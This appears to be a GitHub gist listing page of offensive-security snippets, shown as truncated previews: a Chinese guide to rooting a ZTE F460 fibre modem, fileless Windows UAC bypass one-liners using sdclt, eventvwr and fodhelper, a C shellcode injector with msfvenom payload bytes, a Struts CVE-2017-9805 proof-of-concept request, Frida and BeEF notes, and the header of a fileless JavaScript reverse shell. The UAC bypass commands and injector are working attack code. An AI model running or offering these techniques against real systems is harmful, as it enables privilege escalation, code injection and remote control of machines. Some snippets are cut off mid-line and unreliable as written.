Malayke / ZTE F460 Router Jailbreak.md

Last active June 9, 2025 15:16

中兴 F460 电信光猫越狱破解方法

之前用的光猫不小心进水烧坏了，然后搞了个中兴 F460 拿来用，网上办法多如牛毛，但是试了都不行电信贼的很，只要注册 LOID 之后他就把 telnet 给你关了，然后啥也搞不成，今天琢磨了一整天成功拿到telecomadmin密码，并能随时TELNET进路由器。

为什么要破解？

不破解就有普通用户权限，除了Wi-Fi密码，什么也改不了, 而且 Wi-Fi 名称必须得 ChinaNet 开头，更要命的是电信可以随时远程控制路由器

怎么破解？

最简单的办法是有线或无线连接到路由器后访问 http://192.168.1.1/web_shell_cmd.gch 然后执行以下命令来获取超级用户密码

Malayke / .bat

Created November 25, 2018 04:49 — forked from initpwn/.bat

Fileless UAC Bypass

	#sdclt fileless UAC bypass
	regg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /d "cmd.exe" /f && START /W sdclt.exe && reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f
	#eventvwr fileless UAC bypass
	%windir%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe $executablepath = "Start-Process -FilePath 'cmd.exe'";$cmd = 'Start-Process -FilePath {0} -ArgumentList "/c reg add "HKCU\Software\Classes\mscfile\shell\open\command" /f /d "{0} /c %windir%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -nop -w hidden -c \"IEX $executablepath;IEX $cmd) "' -f $env:comspec;
	#fodhelper fileless UAC bypass
	New-Item -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Value "cmd /c start powershell.exe" -Force;New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force;Start-Process "C:\Windows\System32\fodhelper.exe";Remove-Item "HKCU:\Software\Classes\ms-settings\

Malayke / release-android-debuggable.md

Created November 4, 2018 13:38 — forked from nstarke/release-android-debuggable.md

How to make a Release Android App debuggable

Let's say you want to access the application shared preferences in /data/data/com.mypackage.
You could try to run adb shell and then run-as com.mypackage ( or adb shell run-as com.mypackge ls /data/data/com.mypackage/shared_prefs), but on a production release app downloaded from an app store you're most likely to see:

run-as: Package 'com.mypackage' is not debuggable

Malayke / NotCreateRemoteThread.c

Created September 9, 2018 15:10 — forked from securifybv/NotCreateRemoteThread.c

Run shell code in another process without CreateRemoteThread

	#pragma comment(lib, "Shell32.lib")
	#include <windows.h>
	#include <shlobj.h>

	// msfvenom -p windows/exec -a x86 --platform windows -f c cmd=calc.exe
	int buf_len = 193;
	unsigned char buf[] =
	"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
	"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
	"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"

Malayke / getMoreDomains.py

Created September 9, 2018 05:02 — forked from milo2012/getMoreDomains.py

Get Domains Belonging to Organization from securitytrails.com

	import requests
	import json
	import pprint
	import sys
	import dns.message
	import dns.query
	import dns.rdatatype
	import dns.resolver
	import dns.reversename
	import time

Malayke / Build_In_Memory_CSharp_Project.txt

Created April 6, 2018 02:29 — forked from bohops/Build_In_Memory_CSharp_Project.txt

	After a little more research, 'In Memory' notion was a little exaggerated (hence the quotes). However, we'll call it 'In Memory Inspired' ;-)

	These examples are PowerShell alternatives to MSBuild.exe/CSC.exe for building (and launching) C# programs.

	Basic gist after running PS script statements:

	- Loads C# project from file or web URL
	- Create various tmp files
	- Compile with csc.exe [e.g. "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\subadmin\AppData\Local\Temp\lz2er5kc.cmdline"]
	- Comvert to COFF [e.g. C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\subadmin\AppData\Local\Temp\RES11D5.tmp" "c:\Users\subadmin\AppData\Local\Temp\CSCDECDA670512E403CA28C9512DAE1AB3.TMP"]

Malayke / frida-enumerate-loaded-classes.py

Last active December 13, 2017 10:49

Frida 获取加固后的 apk class 名

	import frida, sys

	def on_message(message, data):
	if message['type'] == 'send':
	print("[*] {0}".format(message['payload']))
	else:
	print(message)

	jscode = """
	Java.perform(function() {

Malayke / gist:43f51f9073feff7a67f847e20da4072b

Created September 6, 2017 02:15

S2-052 CVE-2017-9805 POC

	POST /struts2-rest-showcase/orders/3 HTTP/1.1
	Host: localhost:8080
	Content-Length: 1670
	Cache-Control: max-age=0
	Origin: http://localhost:8080
	Upgrade-Insecure-Requests: 1
	User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
	Content-Type: application/xml
	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8
	DNT: 1

Malayke / how beef gathers browser details on initialization

Created March 26, 2017 15:19 — forked from xntrik/how beef gathers browser details on initialization

	Most of the logic resides in https://github.com/beefproject/beef/tree/master/core/main/client

	https://github.com/beefproject/beef/blob/master/core/main/client/beef.js establishes the beef object in the browser's DOM

	window.onload then runs beef_init() https://github.com/beefproject/beef/blob/master/core/main/client/init.js#L24

	Within beef_init() we run beef.net.browser_details() https://github.com/beefproject/beef/blob/master/core/main/client/init.js#L67

	Within beef.net.browser_details() we gather response from beef.browser.getDetails() https://github.com/beefproject/beef/blob/master/core/main/client/net.js#L503

Malayke / JSRat.ps1

Created March 11, 2016 04:47

Fileless JavaScript Reverse HTTP Shell

	<#

	Author: Casey Smith @subTee

	License: BSD3-Clause

	.SYNOPSIS

	Simple Reverse Shell over HTTP. Execute Commands on Client.